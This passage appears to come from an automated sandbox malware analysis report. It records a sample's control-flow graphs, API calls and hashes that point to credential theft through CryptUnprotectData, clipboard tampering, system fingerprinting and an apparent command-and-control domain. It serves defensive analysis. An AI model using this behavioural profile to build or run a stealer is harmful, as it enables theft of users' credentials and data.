                                                                                              • Instruction Fuzzy Hash: CB13AD3150C7C18AD3359A38886839BBBE2ABD6324F088B6DE4E9973D2D7798445C753

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 457 27c8890-27c88b5 458 27c88c0-27c8908 457->458 458->458 459 27c890a-27c8923 458->459 460 27c8930-27c8972 459->460 460->460 461 27c8974-27c89b2 460->461 462 27c89c0-27c89d2 461->462 462->462 463 27c89d4-27c89f3 462->463 465 27c89f9-27c8a04 463->465 466 27c8b03-27c8b0f 463->466 467 27c8a10-27c8a55 465->467 468 27c8b10-27c8b75 466->468 467->467 469 27c8a57-27c8a6f 467->469 468->468 470 27c8b77-27c8bd7 CoCreateInstance 468->470 471 27c8a70-27c8aed 469->471 472 27c8bdd-27c8c0f 470->472 473 27c90a2-27c90cb call 27cf3e0 GetVolumeInformationW 470->473 471->471 474 27c8aef-27c8afc 471->474 476 27c8c10-27c8c24 472->476 479 27c90cd-27c90d1 473->479 480 27c90d5-27c90d7 473->480 474->466 476->476 478 27c8c26-27c8c53 SysAllocString 476->478 483 27c908e-27c909e SysFreeString 478->483 484 27c8c59-27c8c73 CoSetProxyBlanket 478->484 479->480 482 27c90ed-27c90f4 480->482 485 27c90f6-27c90fd 482->485 486 27c9100-27c9115 482->486 483->473 488 27c8c79-27c8c8f 484->488 489 27c9084-27c908a 484->489 485->486 487 27c9120-27c9134 486->487 487->487 490 27c9136-27c9173 487->490 491 27c8c90-27c8cb5 488->491 489->483 492 27c9180-27c91c8 490->492 491->491 493 27c8cb7-27c8d2f SysAllocString 491->493 492->492 494 27c91ca-27c91ff call 27ada40 492->494 495 27c8d30-27c8d44 493->495 499 27c9200-27c9208 494->499 495->495 497 27c8d46-27c8d70 SysAllocString 495->497 502 27c906f-27c9081 SysFreeString * 2 497->502 503 27c8d76-27c8d98 497->503 499->499 501 27c920a-27c920c 499->501 504 27c90e0-27c90e7 501->504 505 27c9212-27c9222 call 2798130 501->505 502->489 510 27c8d9e-27c8da1 503->510 511 27c9065-27c906b 503->511 504->482 508 27c9227-27c922e 504->508 505->504 510->511 512 27c8da7-27c8dac 510->512 511->502 512->511 513 27c8db2-27c8dfa VariantInit 512->513 514 27c8e00-27c8e2a 513->514 514->514 515 27c8e2c-27c8e3e 514->515 516 27c8e42-27c8e44 515->516 517 27c8e4a-27c8e50 516->517 518 27c9054-27c9061 VariantClear 516->518 517->518 519 27c8e56-27c8e60 517->519 518->511 520 27c8e62-27c8e67 519->520 521 27c8ea3 519->521 522 27c8e7c-27c8e80 520->522 523 27c8ea5-27c8ebd call 2797fa0 521->523 524 27c8e70 522->524 525 27c8e82-27c8e8d 522->525 531 27c9006-27c9017 523->531 532 27c8ec3-27c8ecd 523->532 528 27c8e71-27c8e7a 524->528 529 27c8e8f-27c8e94 525->529 530 27c8e96-27c8e9c 525->530 528->522 528->523 529->528 530->528 533 27c8e9e-27c8ea1 530->533 535 27c901e-27c902a 531->535 536 27c9019 531->536 532->531 534 27c8ed3-27c8edb 532->534 533->528 537 27c8ee0-27c8eed 534->537 538 27c902c 535->538 539 27c9031-27c9051 call 2797fd0 call 2797fb0 535->539 536->535 540 27c8eef-27c8ef4 537->540 541 27c8f00-27c8f06 537->541 538->539 539->518 543 27c8f27 540->543 544 27c8f08-27c8f0b 541->544 545 27c8f45-27c8f53 541->545 548 27c8f2a-27c8f2e 543->548 544->545 547 27c8f0d-27c8f24 544->547 550 27c8fba-27c8fc3 545->550 551 27c8f55-27c8f58 545->551 547->543 554 27c8f30-27c8f36 548->554 552 27c8fcd-27c8fd0 550->552 553 27c8fc5-27c8fc8 550->553 551->550 556 27c8f5a-27c8fb5 551->556 557 27c8fff-27c9001 552->557 558 27c8fd2-27c8ffa 552->558 553->554 554->531 559 27c8f3c-27c8f3e 554->559 556->548 557->543 558->543 559->537 560 27c8f40 559->560 560->531
                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(027D268C,00000000,00000001,027D267C,00000000), ref: 027C8BCC
                                                                                              • SysAllocString.OLEAUT32(-X*^), ref: 027C8C2B
                                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 027C8C6B
                                                                                              • SysAllocString.OLEAUT32(PX), ref: 027C8CBC
                                                                                              • SysAllocString.OLEAUT32(1FDB1DCF), ref: 027C8D4B
                                                                                              • VariantInit.OLEAUT32(CCCFCEE9), ref: 027C8DB7
                                                                                              • SysFreeString.OLEAUT32(?), ref: 027C9079
                                                                                              • SysFreeString.OLEAUT32(?), ref: 027C907F
                                                                                              • SysFreeString.OLEAUT32(?), ref: 027C9092
                                                                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 027C90C7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$AllocFree$BlanketCreateInformationInitInstanceProxyVariantVolume
                                                                                              • String ID: #fw$,\)B$-X*^$2=$7$YdB3$adB3
                                                                                              • API String ID: 2247799857-2780812687
                                                                                              • Opcode ID: 487bcf36ff6941c42779fb23f31da46b4c52a29b96f58d5b9b65755773456585
                                                                                              • Instruction ID: 8c48b49fc11af2fbe05983aac9f7f370584342795822d33e15053fac898b0405
                                                                                              • Opcode Fuzzy Hash: 487bcf36ff6941c42779fb23f31da46b4c52a29b96f58d5b9b65755773456585
                                                                                              • Instruction Fuzzy Hash: 0842F372A083518BD714CF24C8807ABBBE2EFC5314F298A2DE5D59B391D775D806CB92

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • Sleep.KERNELBASE(00000001), ref: 04D31032
                                                                                              • OpenClipboard.USER32(00000000), ref: 04D3103C
                                                                                              • GetClipboardData.USER32(0000000D), ref: 04D3104C
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 04D3105D
                                                                                              • GlobalAlloc.KERNEL32(00000002,-00000004), ref: 04D31090
                                                                                              • GlobalLock.KERNEL32 ref: 04D310A0
                                                                                              • GlobalUnlock.KERNEL32 ref: 04D310C1
                                                                                              • EmptyClipboard.USER32 ref: 04D310CB
                                                                                              • SetClipboardData.USER32(0000000D), ref: 04D310D6
                                                                                              • GlobalFree.KERNEL32 ref: 04D310E3
                                                                                              • GlobalUnlock.KERNEL32(?), ref: 04D310ED
                                                                                              • CloseClipboard.USER32 ref: 04D310F3
                                                                                              • GetClipboardSequenceNumber.USER32 ref: 04D310F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2942123190.0000000004D31000.00000020.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2942074432.0000000004D30000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2942137443.0000000004D32000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_4d30000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
                                                                                              • String ID:
                                                                                              • API String ID: 1416286485-0
                                                                                              • Opcode ID: b091036d13516a36684fdfa6720ffd880e7c147ab0538cf7b0856b4b103b7446
                                                                                              • Instruction ID: fab8d93d87757fd767e6d15c6fc35ae4f30bc47deb1597c00631ed2e1ec7657e
                                                                                              • Opcode Fuzzy Hash: b091036d13516a36684fdfa6720ffd880e7c147ab0538cf7b0856b4b103b7446
                                                                                              • Instruction Fuzzy Hash: D1217131B042629BDB202B71AC09B6E77A8FF04787F04047CF985D6251EB35AC00C6A2

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 583 27a5270-27a528a 584 27a5290-27a529b 583->584 584->584 585 27a529d-27a52ab 584->585 586 27a52ad-27a52b2 585->586 587 27a52b4 585->587 588 27a52b7-27a5315 call 2797fa0 586->588 587->588 591 27a5320-27a5347 588->591 591->591 592 27a5349-27a5355 591->592 593 27a5371-27a5381 592->593 594 27a5357-27a535f 592->594 596 27a5383-27a538a 593->596 597 27a53a1-27a53c5 call 27d0810 593->597 595 27a5360-27a536f 594->595 595->593 595->595 598 27a5390-27a539f 596->598 601 27a55da-27a55e0 call 2797fb0 597->601 602 27a55f8-27a55ff 597->602 603 27a569e-27a56a6 597->603 604 27a541c-27a5446 call 2797fa0 call 27d0ba0 597->604 605 27a53d2-27a53e8 call 27d0af0 597->605 606 27a5692-27a569b call 2797fb0 597->606 607 27a53f0-27a5403 call 27d0af0 597->607 608 27a55e9 597->608 609 27a55ef-27a55f5 call 2797fb0 597->609 610 27a568c 597->610 611 27a53cc 597->611 612 27a540c-27a5415 597->612 613 27a544d-27a5454 597->613 614 27a5602-27a561f 597->614 615 27a5600 597->615 598->597 598->598 601->608 602->615 617 27a56a8-27a56ad 603->617 618 27a56af 603->618 604->601 604->602 604->603 604->606 604->608 604->609 604->613 604->614 604->615 623 27a57db-27a57dd 604->623 624 27a57d2-27a57d8 call 2797fb0 604->624 625 27a57f1-27a581a call 27d0af0 604->625 626 27a57e8-27a57ee call 2797fb0 604->626 627 27a57cc 604->627 628 27a57e2 604->628 605->607 606->603 607->612 609->602 611->605 612->601 612->602 612->603 612->604 612->606 612->608 612->609 612->613 612->614 612->615 612->623 612->624 612->625 612->626 612->627 612->628 631 27a5460-27a5469 613->631 630 27a5620-27a5642 614->630 633 27a56b2-27a5713 call 2797fa0 617->633 618->633 640 27a95c7-27a95d0 623->640 624->623 654 27a5bef-27a5c59 625->654 655 27a5bdd 625->655 656 27a5890-27a58af 625->656 657 27a5821-27a584e call 2797fa0 call 27d0ba0 625->657 658 27a5866-27a587a call 2791000 625->658 659 27a5887-27a588d call 2797fb0 625->659 660 27a5855 625->660 661 27a5a05-27a5a07 625->661 626->625 630->630 641 27a5644-27a5650 630->641 631->631 643 27a546b-27a5476 631->643 670 27a5720-27a5742 633->670 641->610 648 27a5652-27a5661 641->648 650 27a5478-27a547d 643->650 651 27a547f 643->651 664 27a5670-27a5677 648->664 653 27a5482-27a54ff call 2797fa0 650->653 651->653 685 27a5500-27a5559 653->685 668 27a5c60-27a5c97 654->668 672 27a58b0-27a58d2 656->672 657->654 657->655 657->656 657->658 657->659 657->660 657->661 658->659 659->656 660->658 667 27a5a10-27a5a16 661->667 673 27a5679-27a567c 664->673 674 27a5680-27a5686 664->674 667->667 678 27a5a18-27a5a29 667->678 668->668 679 27a5c99-27a5cc3 call 2791da0 668->679 670->670 681 27a5744-27a5752 670->681 672->672 683 27a58d4-27a58dc 672->683 673->664 684 27a567e 673->684 674->610 675 27a5e0b-27a5e1a call 27cd760 674->675 725 27a5e23 675->725 687 27a5a2b-27a5a2e 678->687 688 27a5a30 678->688 679->654 679->655 679->661 709 27a5cf8-27a5d02 679->709 710 27a5f1d-27a5f23 call 2797fb0 679->710 711 27a5be3-27a5bec call 2797fb0 679->711 712 27a5f26-27a5f3f call 27cf3e0 679->712 691 27a5771-27a5781 681->691 692 27a5754-27a5759 681->692 693 27a591a-27a5983 call 2791a60 683->693 694 27a58de-27a58ef 683->694 684->610 685->685 695 27a555b-27a556b 685->695 687->688 697 27a5a31-27a5a3d 687->697 688->697 701 27a5783-27a578a 691->701 702 27a57a1-27a57c5 call 27d0810 691->702 700 27a5760-27a576f 692->700 729 27a5990-27a59dc 693->729 703 27a58f0-27a58f7 694->703 705 27a556d-27a5572 695->705 706 27a5591-27a55a5 695->706 707 27a5a3f-27a5a42 697->707 708 27a5a44 697->708 700->691 700->700 713 27a5790-27a579f 701->713 702->623 702->624 702->625 702->626 702->627 702->628 702->656 702->657 702->658 702->659 702->660 715 27a58f9-27a58fc 703->715 716 27a5900-27a5906 703->716 720 27a5580-27a558f 705->720 722 27a55c1-27a55d4 call 2798d20 706->722 723 27a55a7-27a55af 706->723 707->708 721 27a5a45-27a5a63 call 2797fa0 707->721 708->721 724 27a5d10-27a5d19 709->724 710->712 711->654 712->640 713->702 713->713 715->703 727 27a58fe 715->727 716->693 728 27a5908-27a5917 call 27cd760 716->728 720->706 720->720 748 27a5a69-27a5a6d 721->748 749 27a5b77-27a5bd6 call 27cf3e0 CryptUnprotectData 721->749 722->601 735 27a55b0-27a55bf 723->735 724->724 736 27a5d1b-27a5d1e 724->736 738 27a5e26-27a5e63 call 2797fa0 725->738 727->693 728->693 729->729 740 27a59de-27a59fe call 2791da0 729->740 735->722 735->735 736->725 742 27a5d24-27a5d29 736->742 753 27a5e70-27a5eab 738->753 740->654 740->655 740->661 740->709 742->738 752 27a5a97-27a5ae6 call 27acf00 * 2 748->752 749->654 749->655 749->709 749->710 749->711 749->712 768 27a5ae8-27a5aff call 27acf00 752->768 769 27a5a80-27a5a91 752->769 753->753 756 27a5ead-27a5eb9 753->756 759 27a5ebb-27a5ebe 756->759 760 27a5ed1-27a5ee1 756->760 762 27a5ec0-27a5ecf 759->762 763 27a5ee3-27a5eea 760->763 764 27a5f01-27a5f17 call 2798d20 760->764 762->760 762->762 766 27a5ef0-27a5eff 763->766 764->710 766->764 766->766 768->769 773 27a5b05-27a5b2e 768->773 769->749 769->752 773->769 774 27a5b34-27a5b49 call 27acf00 773->774 777 27a5a6f-27a5a73 774->777 778 27a5b4f-27a5b72 774->778 777->769 778->777
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: U3W$" &$'2/B$)I&K$+E%G$XY$y
                                                                                              • API String ID: 0-81430434
                                                                                              • Opcode ID: 660030e394920426c88a2b0359f9693122f8923b1cdfce6d4fb55fbf2a91a630
                                                                                              • Instruction ID: ded872a438b2b4b0c8eba42fc895c4886b63ac94323b1c6972164078c336557a
                                                                                              • Opcode Fuzzy Hash: 660030e394920426c88a2b0359f9693122f8923b1cdfce6d4fb55fbf2a91a630
                                                                                              • Instruction Fuzzy Hash: 535214B19493818FD721CF24D8957ABB7F2FFC5324F588A2DE4899B251E7349801CB92

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 846 279d6c5-279d6ef call 2799710 CoUninitialize 849 279d6f0-279d727 846->849 849->849 850 279d729-279d739 849->850 851 279d740-279d754 850->851 851->851 852 279d756-279d7b3 851->852 853 279d7c0-279d7da 852->853 853->853 854 279d7dc-279d7ed 853->854 855 279d80b-279d813 854->855 856 279d7ef-279d7f6 854->856 858 279d82b-279d835 855->858 859 279d815-279d816 855->859 857 279d800-279d809 856->857 857->855 857->857 861 279d84b-279d853 858->861 862 279d837-279d83b 858->862 860 279d820-279d829 859->860 860->858 860->860 863 279d86b-279d875 861->863 864 279d855-279d856 861->864 865 279d840-279d849 862->865 867 279d88b-279d897 863->867 868 279d877-279d87b 863->868 866 279d860-279d869 864->866 865->861 865->865 866->863 866->866 870 279d899-279d89b 867->870 871 279d8b1-279d9d4 867->871 869 279d880-279d889 868->869 869->867 869->869 872 279d8a0-279d8ad 870->872 873 279d9e0-279da02 871->873 872->872 874 279d8af 872->874 873->873 875 279da04-279da1f 873->875 874->871 876 279da20-279da90 875->876 876->876 877 279da92-279db03 call 279b570 call 2799710 CoUninitialize 876->877 882 279db10-279db47 877->882 882->882 883 279db49-279db59 882->883 884 279db60-279db74 883->884 884->884 885 279db76-279dbd3 884->885 886 279dbe0-279dbfa 885->886 886->886 887 279dbfc-279dc0d 886->887 888 279dc2b-279dc33 887->888 889 279dc0f-279dc16 887->889 891 279dc4b-279dc55 888->891 892 279dc35-279dc36 888->892 890 279dc20-279dc29 889->890 890->888 890->890 894 279dc6b-279dc73 891->894 895 279dc57 891->895 893 279dc40-279dc49 892->893 893->891 893->893 896 279dc8b-279dc95 894->896 897 279dc75-279dc76 894->897 898 279dc60-279dc69 895->898 900 279dcab-279dcb7 896->900 901 279dc97-279dc9b 896->901 899 279dc80-279dc89 897->899 898->894 898->898 899->896 899->899 903 279dcb9-279dcbb 900->903 904 279dcd1-279de02 900->904 902 279dca0-279dca9 901->902 902->900 902->902 905 279dcc0-279dccd 903->905 906 279de10-279de31 904->906 905->905 907 279dccf 905->907 906->906 908 279de33-279de52 906->908 907->904 909 279de60-279ded1 908->909 909->909 910 279ded3-279defd call 279b570 909->910 912 279df02-279df18 910->912
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: Uninitialize
                                                                                              • String ID: )./$VMNO$undesirabkel.click
                                                                                              • API String ID: 3861434553-3526534237
                                                                                              • Opcode ID: 5bf1cdd7010988f352e2ce7d64c76417410bc497dddf3d02815cb4a5be810aee
                                                                                              • Instruction ID: 28424a62bc2f95f5a845f1c6723ff04d14ba78f8ab246d2957db616bc253c918
                                                                                              • Opcode Fuzzy Hash: 5bf1cdd7010988f352e2ce7d64c76417410bc497dddf3d02815cb4a5be810aee
                                                                                              • Instruction Fuzzy Hash: D112FD7124D3C18FD7319F28E8987DBBFE1AB97200F185A6CC0D99B292D7784506CB96

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 913 27986f0-2798701 call 27cce70 916 2798a5e-2798a60 ExitProcess 913->916 917 2798707-279870e call 27c5060 913->917 920 2798a59 call 27cd6e0 917->920 921 2798714-2798738 GetCurrentProcessId GetCurrentThreadId 917->921 920->916 922 279873a-279873c 921->922 923 279873e-2798861 SHGetSpecialFolderPathW 921->923 922->923 925 2798870-27988b5 923->925 925->925 926 27988b7-27988e3 call 27cbb10 925->926 929 27988f0-279892b 926->929 930 279892d-2798962 929->930 931 2798964-279897b GetForegroundWindow 929->931 930->929 932 2798981-27989aa 931->932 933 2798a23-2798a3b call 2799c20 931->933 935 27989ac-27989ae 932->935 936 27989b0-2798a21 932->936 938 2798a3d call 279cad0 933->938 939 2798a47-2798a4e 933->939 935->936 936->933 942 2798a42 call 279b540 938->942 939->920 941 2798a50-2798a56 call 2797fb0 939->941 941->920 942->939
                                                                                              APIs
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 02798714
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0279871E
                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0279883D
                                                                                              • GetForegroundWindow.USER32 ref: 02798973
                                                                                                • Part of subcall function 0279CAD0: CoInitializeEx.COMBASE(00000000,00000002), ref: 0279CAE3
                                                                                                • Part of subcall function 0279B540: FreeLibrary.KERNEL32(02798A47), ref: 0279B546
                                                                                                • Part of subcall function 0279B540: FreeLibrary.KERNEL32 ref: 0279B567
                                                                                              • ExitProcess.KERNEL32 ref: 02798A60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3072701918-0
                                                                                              • Opcode ID: 1871819bcfc6a5464ce5812373cfe416f67c92a671bc91381925f31a56f3382b
                                                                                              • Instruction ID: ce291361b54c234336c3f74ff591f60a2bd1018f7bc9bee7f6d6a4fdb00d6d58
                                                                                              • Opcode Fuzzy Hash: 1871819bcfc6a5464ce5812373cfe416f67c92a671bc91381925f31a56f3382b
                                                                                              • Instruction Fuzzy Hash: 9C813672B483044FD718EEAADC8135AB7D7EBC9210F09C53D9988DB392EA749C069791

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 973 27baf45-27baf66 974 27baf70-27bafbc 973->974 974->974 975 27bafbe-27bafc5 974->975 976 27bafdb-27bafe7 975->976 977 27bafc7-27bafcb 975->977 979 27bafe9-27bafeb 976->979 980 27bb001-27bb05f call 27cf3e0 GetPhysicallyInstalledSystemMemory 976->980 978 27bafd0-27bafd9 977->978 978->976 978->978 981 27baff0-27baffd 979->981 985 27bb060-27bb08b 980->985 981->981 983 27bafff 981->983 983->980 985->985 986 27bb08d-27bb0c3 call 27ada40 985->986 989 27bb0d0-27bb111 986->989 989->989 990 27bb113-27bb11a 989->990 991 27bb12b-27bb133 990->991 992 27bb11c 990->992 994 27bb14b-27bb158 991->994 995 27bb135-27bb136 991->995 993 27bb120-27bb129 992->993 993->991 993->993 997 27bb17b-27bb1cf 994->997 998 27bb15a-27bb161 994->998 996 27bb140-27bb149 995->996 996->994 996->996 1000 27bb1d0-27bb234 997->1000 999 27bb170-27bb179 998->999 999->997 999->999 1000->1000 1001 27bb236-27bb23d 1000->1001 1002 27bb25b-27bb268 1001->1002 1003 27bb23f-27bb243 1001->1003 1005 27bb28b-27bb342 1002->1005 1006 27bb26a-27bb271 1002->1006 1004 27bb250-27bb259 1003->1004 1004->1002 1004->1004 1007 27bb280-27bb289 1006->1007 1007->1005 1007->1007
                                                                                              APIs
                                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 027BB035
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                                              • String ID: #$E?s:
                                                                                              • API String ID: 3960555810-1163437786
                                                                                              • Opcode ID: 8baa5219d4dd83fe74199f279821e646d8d1c4b7ac9291e161a72ce6d1ba4a46
                                                                                              • Instruction ID: 5c896eac7e7eb8f5841042af39d47d6327465e74754b9182d481f6cf65dd843e
                                                                                              • Opcode Fuzzy Hash: 8baa5219d4dd83fe74199f279821e646d8d1c4b7ac9291e161a72ce6d1ba4a46
                                                                                              • Instruction Fuzzy Hash: EAA1E87160D3828BD33ACF2584513EBBBE2AFD6304F18996DD4D987292D779410ACB52

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1008 27c2620-27c2705 GetSystemMetrics * 2 1014 27c270c-27c2b96 1008->1014
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: MetricsSystem
                                                                                              • String ID:
                                                                                              • API String ID: 4116985748-3916222277
                                                                                              • Opcode ID: 3f7587cdae7c62c2fc14d702e2805e50b4a4f119e8f555460a81d8e5b20f16b1
                                                                                              • Instruction ID: 376b8b6e109ebbb6e5ba34f80fb551f43fc62881c963aff38c4499425347ac26
                                                                                              • Opcode Fuzzy Hash: 3f7587cdae7c62c2fc14d702e2805e50b4a4f119e8f555460a81d8e5b20f16b1
                                                                                              • Instruction Fuzzy Hash: D3C159B060A3858FEB74DF1AD6496CBFBF4AB85308F1189ADD5889B350CB745548CF82

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1064 27b3288-27b328e 1065 27b3290-27b3295 1064->1065 1066 27b3297 1064->1066 1067 27b329a-27b32b8 call 2797fa0 RtlExpandEnvironmentStrings 1065->1067 1066->1067 1070 27b32bf 1067->1070 1071 27b32ce-27b32d5 1067->1071 1072 27b32e2-27b32eb 1067->1072 1073 27b32e0 1067->1073 1074 27b32c5-27b32cb call 2797fb0 1067->1074 1070->1074 1071->1073 1076 27b32ed-27b32f2 1072->1076 1077 27b32f4 1072->1077 1073->1072 1074->1071 1079 27b32fb-27b332e call 2797fa0 1076->1079 1077->1079 1082 27b3330-27b3344 1079->1082 1082->1082 1083 27b3346-27b334e 1082->1083 1084 27b3371-27b337e 1083->1084 1085 27b3350-27b3355 1083->1085 1087 27b33a1-27b33b9 call 27d0980 1084->1087 1088 27b3380-27b3384 1084->1088 1086 27b3360-27b336f 1085->1086 1086->1084 1086->1086 1092 27b3579-27b3624 1087->1092 1093 27b33d0-27b33d9 1087->1093 1094 27b33c0-27b33c7 1087->1094 1089 27b3390-27b339f 1088->1089 1089->1087 1089->1089 1097 27b3630-27b365f 1092->1097 1095 27b33db-27b33e0 1093->1095 1096 27b33e2 1093->1096 1094->1093 1098 27b33e9-27b3492 call 2797fa0 1095->1098 1096->1098 1097->1097 1099 27b3661-27b3671 call 27b10d0 1097->1099 1104 27b34a0-27b34cc 1098->1104 1102 27b3676-27b3679 1099->1102 1104->1104 1105 27b34ce-27b34d7 1104->1105 1106 27b34d9-27b34e1 1105->1106 1107 27b3501-27b3512 1105->1107 1108 27b34f0-27b34ff 1106->1108 1109 27b3533 1107->1109 1110 27b3514-27b351f 1107->1110 1108->1107 1108->1108 1112 27b3537-27b355a GetLogicalDrives call 27d0980 1109->1112 1111 27b3520-27b352f 1110->1111 1111->1111 1113 27b3531 1111->1113 1112->1073 1112->1092 1112->1093 1112->1094 1113->1112
                                                                                              APIs
                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?), ref: 027B32AD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
